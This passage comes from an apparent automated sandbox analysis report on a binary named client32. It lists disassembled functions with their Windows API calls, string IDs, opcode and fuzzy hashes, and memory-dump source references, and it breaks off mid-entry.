                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AtomDeleteGlobal$LongWindow
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 964255742-0
                                                                                                                                                                                • Opcode ID: 6d1c3e4c7ba79be894aa668b9e160f569f6102aeba86935b87fce5edf1bf1130
                                                                                                                                                                                • Instruction ID: 220dc2ec1870e2cd5bb434e19042b50d90bfbecd9004e1d9cbcb935e023cb0cc
                                                                                                                                                                                • Opcode Fuzzy Hash: 6d1c3e4c7ba79be894aa668b9e160f569f6102aeba86935b87fce5edf1bf1130
                                                                                                                                                                                • Instruction Fuzzy Hash: 97E065B910423697C7149F6AAC40D72F3ECAF98614715452DF175C3594C778D445DB70
                                                                                                                                                                                Function 11007255 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                                                                                                                • CreateWindowExA.USER32(00000000,edit,00000000,40040004,?,?,?,?,?,00000002,00000000,?), ref: 110073A7
                                                                                                                                                                                • SetFocus.USER32(?), ref: 11007403
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CreateFocusWindowwsprintf
                                                                                                                                                                                • String ID: edit
                                                                                                                                                                                • API String ID: 4214736919-2167791130
                                                                                                                                                                                • Opcode ID: 632f14b8d2d041a5878fb49c8dc8ccd70294b0a39aa3cab02e3d3c9b1c413467
                                                                                                                                                                                • Instruction ID: e81607fb03d3f2f95005a1d43bd356d739516b9639758e6caabf034df3046c31
                                                                                                                                                                                • Opcode Fuzzy Hash: 632f14b8d2d041a5878fb49c8dc8ccd70294b0a39aa3cab02e3d3c9b1c413467
                                                                                                                                                                                • Instruction Fuzzy Hash: A2519FB5A00606AFE715CF64DC81BAFB7E5FB88354F118569E955C7340EB34AA02CB60
                                                                                                                                                                                Function 11009270 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 110092E5
                                                                                                                                                                                • _memmove.LIBCMT ref: 11009336
                                                                                                                                                                                  • Part of subcall function 11008DD0: std::_Xinvalid_argument.LIBCPMT ref: 11008DEA
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Xinvalid_argumentstd::_$_memmove
                                                                                                                                                                                • String ID: string too long
                                                                                                                                                                                • API String ID: 2168136238-2556327735
                                                                                                                                                                                • Opcode ID: 22491d451eb23d87cec3ea30fc5d884b072beb3f123d3bfee90730829ce68beb
                                                                                                                                                                                • Instruction ID: dd3894f676f01ff6a75acb4aa2435548b18b289b65f075ee81d5ee4d5d084719
                                                                                                                                                                                • Opcode Fuzzy Hash: 22491d451eb23d87cec3ea30fc5d884b072beb3f123d3bfee90730829ce68beb
                                                                                                                                                                                • Instruction Fuzzy Hash: 8C31DB72B046108BF720DE9DE88099EF7EDEB957B4B20491FE589C7680E771AC4087A0
                                                                                                                                                                                Function 110E1260 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Xinvalid_argument_memmovestd::_
                                                                                                                                                                                • String ID: string too long
                                                                                                                                                                                • API String ID: 256744135-2556327735
                                                                                                                                                                                • Opcode ID: f63589a1e1e49e26468f6bc49513f74121357c805117a5e251a3e538b8b1e039
                                                                                                                                                                                • Instruction ID: 4942d9d917c342fdb8aca387283afa0bcd15718542992abc979dc690a8db670a
                                                                                                                                                                                • Opcode Fuzzy Hash: f63589a1e1e49e26468f6bc49513f74121357c805117a5e251a3e538b8b1e039
                                                                                                                                                                                • Instruction Fuzzy Hash: 7931B372B152058F8724DE9EEC848EEF7EAEFD57613104A1FE442C7640DB31AC5187A1
                                                                                                                                                                                Function 11153610 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 100COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _calloc
                                                                                                                                                                                • String ID: ..\ctl32\WCUNPACK.C$pcursor
                                                                                                                                                                                • API String ID: 1679841372-1228383122
                                                                                                                                                                                • Opcode ID: d36c3ae89da492b68c1a5de3cd4499d6996b853b648d0c9864d32df67a94deb9
                                                                                                                                                                                • Instruction ID: b26f1d22ef5b92abdc0aaadc15ec17b3d58840866ba8b83ef5c5c7396e1139f5
                                                                                                                                                                                • Opcode Fuzzy Hash: d36c3ae89da492b68c1a5de3cd4499d6996b853b648d0c9864d32df67a94deb9
                                                                                                                                                                                • Instruction Fuzzy Hash: 2E316D75D1030AAACB40DFE4C9819EFF7F9EF89318F104119E915A7300EB71AA45CBA5
                                                                                                                                                                                Function 1103B150 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • _calloc.LIBCMT ref: 1103B162
                                                                                                                                                                                • _free.LIBCMT ref: 1103B25B
                                                                                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000), ref: 11029A8C
                                                                                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorExitLastMessageProcess_calloc_freewsprintf
                                                                                                                                                                                • String ID: CLTCONN.CPP
                                                                                                                                                                                • API String ID: 183652615-2872349640
                                                                                                                                                                                • Opcode ID: 936e6a36257020ec0205bea0584bfe26bf89bb89fd77570046a38701b5045d41
                                                                                                                                                                                • Instruction ID: 20d7259e8fe77d3daff0af84d5ff1d15e913130fc2269d1c6afd747bd8efee53
                                                                                                                                                                                • Opcode Fuzzy Hash: 936e6a36257020ec0205bea0584bfe26bf89bb89fd77570046a38701b5045d41
                                                                                                                                                                                • Instruction Fuzzy Hash: F231C875A10B069AD310CF95C881BB7F3E4FF44318F048669E9598B641F774F905C3A5
                                                                                                                                                                                Function 1108F720 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 86COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                                                                                                                • std::exception::exception.LIBCMT ref: 1108F7BC
                                                                                                                                                                                • __CxxThrowException@8.LIBCMT ref: 1108F7D1
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Exception@8Throwstd::exception::exceptionwsprintf
                                                                                                                                                                                • String ID: L
                                                                                                                                                                                • API String ID: 491363124-2909332022
                                                                                                                                                                                • Opcode ID: f00328396c0a9004fd41e80bea26b3a40243baf700eacf4f215ad639da4149fd
                                                                                                                                                                                • Instruction ID: 369f405687447c84649efdd58832c02068d177a3a0274ca2d5cff2ffa4839110
                                                                                                                                                                                • Opcode Fuzzy Hash: f00328396c0a9004fd41e80bea26b3a40243baf700eacf4f215ad639da4149fd
                                                                                                                                                                                • Instruction Fuzzy Hash: 9F3160B5D04259AEEB11DFA4C840BDEFBF8FB08314F14426EE915A7280D775A904CBA1
                                                                                                                                                                                Function 1100F2A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 1100F2BB
                                                                                                                                                                                  • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612AE
                                                                                                                                                                                  • Part of subcall function 11161299: __CxxThrowException@8.LIBCMT ref: 111612C3
                                                                                                                                                                                  • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612D4
                                                                                                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 1100F2D2
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                                                                                                                                                                • String ID: string too long
                                                                                                                                                                                • API String ID: 963545896-2556327735
                                                                                                                                                                                • Opcode ID: 75f838df1ffa959431b4a62d365d349d8fd4399dcfd8cc9140359aaa01b8e6d6
                                                                                                                                                                                • Instruction ID: 9c03118c2fef7a30d7f16138fb3dcb5344bdbe7bcaefeaa8633fdbb4ef9eb1a5
                                                                                                                                                                                • Opcode Fuzzy Hash: 75f838df1ffa959431b4a62d365d349d8fd4399dcfd8cc9140359aaa01b8e6d6
                                                                                                                                                                                • Instruction Fuzzy Hash: E711E9737006148FF321D95DA880BAAF7EDEF957B4F60065FE591CB640C7A1A80083A1
                                                                                                                                                                                Function 110232A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetDlgItemTextA.USER32(?,?,?,00000100), ref: 110232D7
                                                                                                                                                                                • SetDlgItemTextA.USER32(?,?,?), ref: 1102335F
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ItemText
                                                                                                                                                                                • String ID: ...
                                                                                                                                                                                • API String ID: 3367045223-440645147
                                                                                                                                                                                • Opcode ID: 7ba4d17582a0588f0451433b84a7869b440f5c4537ea1e2e090536e708e6e61c
                                                                                                                                                                                • Instruction ID: 288fafb08c6b2ba60c27d59f26b93e6fc9d809d534a4309207b318a271e26125
                                                                                                                                                                                • Opcode Fuzzy Hash: 7ba4d17582a0588f0451433b84a7869b440f5c4537ea1e2e090536e708e6e61c
                                                                                                                                                                                • Instruction Fuzzy Hash: 1121A2756046199BCB24CF68C880FEAF7F9AF99304F1081D9E58997240DAB0AD85CF90
                                                                                                                                                                                Function 11043760 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65threadCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetWindowThreadProcessId.USER32(?,?), ref: 11043784
                                                                                                                                                                                • GetClassNameA.USER32(?,?,00000040), ref: 11043799
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ClassNameProcessThreadWindow
                                                                                                                                                                                • String ID: tooltips_class32
                                                                                                                                                                                • API String ID: 2910564809-1918224756
                                                                                                                                                                                • Opcode ID: 3ae034520ac3d53ec4c31f15285db8001f715e4c6633cc2b43cb0f8bea8d76e3
                                                                                                                                                                                • Instruction ID: 7b66b5eeeba6873e3bd91d5637fb3b576f23a09c5117b8e426f31f0334ec312d
                                                                                                                                                                                • Opcode Fuzzy Hash: 3ae034520ac3d53ec4c31f15285db8001f715e4c6633cc2b43cb0f8bea8d76e3
                                                                                                                                                                                • Instruction Fuzzy Hash: DF112B71A080599BD711DF74C880AEDFBB9FF55224F6051E9DC819FA40EB71A906C790
                                                                                                                                                                                Function 110ED5D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62registryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?), ref: 110ED600
